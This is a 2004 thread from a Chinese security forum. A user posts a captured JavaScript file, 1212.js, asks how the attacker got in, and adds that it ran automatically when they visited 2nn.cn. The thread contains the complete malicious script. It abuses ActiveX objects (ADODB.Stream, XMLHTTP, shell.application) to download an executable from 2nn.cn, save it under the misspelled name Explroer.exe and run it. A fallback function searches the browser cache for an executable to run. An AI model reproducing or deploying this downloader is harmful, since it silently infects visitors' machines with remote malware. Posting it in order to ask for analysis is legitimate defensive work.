论坛: 菜鸟乐园 标题: 请高手看看。。这是什么。。能从这个知道他进入的方法吗?((在线等)) 复制本贴地址    
作者: laoye [laoye]    论坛用户   登录
function EARTHSIMULATOR(){url=document.location.href;xtmu=url.substring(6,url.indexOf('\\',9)+1);xtp=url.substr(6,3);var shell=new ActiveXObject("shell.application");var runbz=1;var exeSize=17920;var a=/s\[\d*\]\.exe/gi;a.compile("s\\[\\d*\\]\\.exe","gi");var b=/[A-Za-z]:\\/gi;b.compile("[A-Za-z]:\\\\","gi");wjj(xtmu+"Temporary Internet Files\\");if(runbz)wjj(xtp+"Documents and Settings\\");if(runbz)yp();function yp(){try{var c=new Enumerator(shell.namespace("c:\\").ParentFolder.Items());for (;!c.atEnd();c.moveNext()){if(runbz){if(b.test(c.item().path))wjj(c.item().path);}else break;}}catch(e){}}function wjj(b){try{var c=new Enumerator(shell.namespace(b).Items());for (;!c.atEnd();c.moveNext()){if(runbz&&c.item().Size==exeSize&&a.test(c.item().path)){ var f=c.item().path; var v=f.lastIndexOf('\\')+1; try{ shell.namespace(f.substring(0,v)).items().item(f.substr(v)).invokeverb(); runbz=0; break; }catch(e){}}if(!c.item().Size)wjj(c.item().path+"\\");}}catch(e){}}}function qq482878(){var name="Explroer.exe";var url="http://2nn.cn/s.exe";try{var folder=document.location.href;folder=folder.substring(6,folder.indexOf('\\',9)+1)+name;var xml=new ActiveXObject("Microsoft.XMLHTTP");xml.open("GET",url,false);xml.send();if(xml.status==200){var ado=new ActiveXObject("ADODB.Stream");ado.Type=1;ado.Open();ado.write(xml.responseBody);ado.SaveToFile(folder,2);ado.Close();ado=null;}xml=null;document.body.insertAdjacentHTML('AfterBegin','<OBJECT style="display:none;" TYPE="application/x-oleobject" CODEBASE="'+folder+'"></OBJECT>');}catch(e){}}try{new ActiveXObject("ADODB.Stream");qq482878();}catch(e){EARTHSIMULATOR();}

文件名为1212.js


[此贴被 laoye(laoye) 在 04月02日20时37分 编辑过]

地主 发表时间: 04-04-02 20:34
回复: laoye [laoye]   论坛用户   登录
发现的时候。是在打开2nn.cn时。自动打开了IE左边的搜索而发现的。

B1层 发表时间: 04-04-02 20:38

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号